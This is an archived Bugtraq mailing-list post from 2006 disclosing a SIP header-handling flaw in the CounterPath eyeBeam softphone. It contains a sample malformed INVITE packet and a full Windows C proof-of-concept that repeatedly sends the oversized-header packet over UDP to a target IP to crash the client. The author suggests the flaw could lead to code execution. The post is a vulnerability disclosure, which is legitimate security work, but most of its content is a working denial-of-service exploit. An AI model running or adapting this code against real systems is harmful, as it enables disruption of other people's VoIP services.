lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060116025842.2161.qmail@securityfocus.com>
Date: 16 Jan 2006 02:58:42 -0000
From: zwell@...u.com
To: bugtraq@...urityfocus.com
Subject: CounterPath eyeBeam Handing SIP header Vulnerabilities



eyeBeam is a SIP softphone supporting open standards for VoIP, Video and Instant Messaging. 
There is a vunerability in it while handing SIP header with a large field name like this:
 
INVITE sip:a@....0.0.1 SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119
From: 1249 <sip:a@....0.0.1>;tag=1249
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Receiver <sip:100012@....16.1.1>
Call-ID: 4166@<172.16.3.6>   <--Change it to target IP
CSeq: 18571 INVITE
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 130

v=0
o=1249 1249 1249 IN IP4 127.0.0.1
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

If you send the packet(several times) to eyeBeam when it's starting and have no call opreation, 
then it will crashed for reading a unvalid address which we can control. 
If you send it(several times) when it's in a call, then it will be unresponse(will not dial and receive any more) or crashed for writing a address(cannot control it now, but it's possible, and as I think, it can lead to execute code).
It looks like some memory operation error exists.

Addtion : the lastest version is affected.

====================eyeBeam_dos.c========================

/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : zwell@...u.com
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/

#include <stdio.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

char *sendbuf1 = 
"INVITE sip:a@....0.0.1 SIP/2.0\r\n"
"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:a@....0.0.1>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:a@....0.0.1>\r\n";

char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";


int main(int argc, char **argv) 
{
    WSADATA wsaData;
    SOCKET    sock;
    sockaddr_in RecvAddr;
	char sendbuf[4096];
	int iResult;
	int port = 8376; //default is 8376, but SIP's default port is 5060

	printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");
	printf("Email : zwell@...u.com\nBlog : http://www.donews.net/zwell\n\n");
	if(argc < 2)
	{
		printf("Usage : %s <target ip> [port]\n", argv[0]);
		return 0;
	}

	if(argc == 3)
		port = atoi(argv[2]);

    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != NO_ERROR)
	{
        printf("Error at WSAStartup()\n");
		return 0;
	}

	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

	ZeroMemory(&RecvAddr, sizeof(RecvAddr));
    RecvAddr.sin_family = AF_INET;
    RecvAddr.sin_port = htons((short)port); 
    RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);

	printf("Target is : %s\t port is : %d\r\n", argv[1], port);
	for(int i=0; i<20; i++)
	{
		sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1, argv[1], sendbuf2);
		if(SOCKET_ERROR == sendto(sock, 
				sendbuf, 
				strlen(sendbuf), 
				0, 
				(SOCKADDR *) &RecvAddr, 
				sizeof(RecvAddr)))
		{
			printf("sendto wrong:%d\n", WSAGetLastError());
			continue;
		}
	}
    
	printf("Now check the target is crafted?\r\n");

    WSACleanup();
    return 1;
}


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ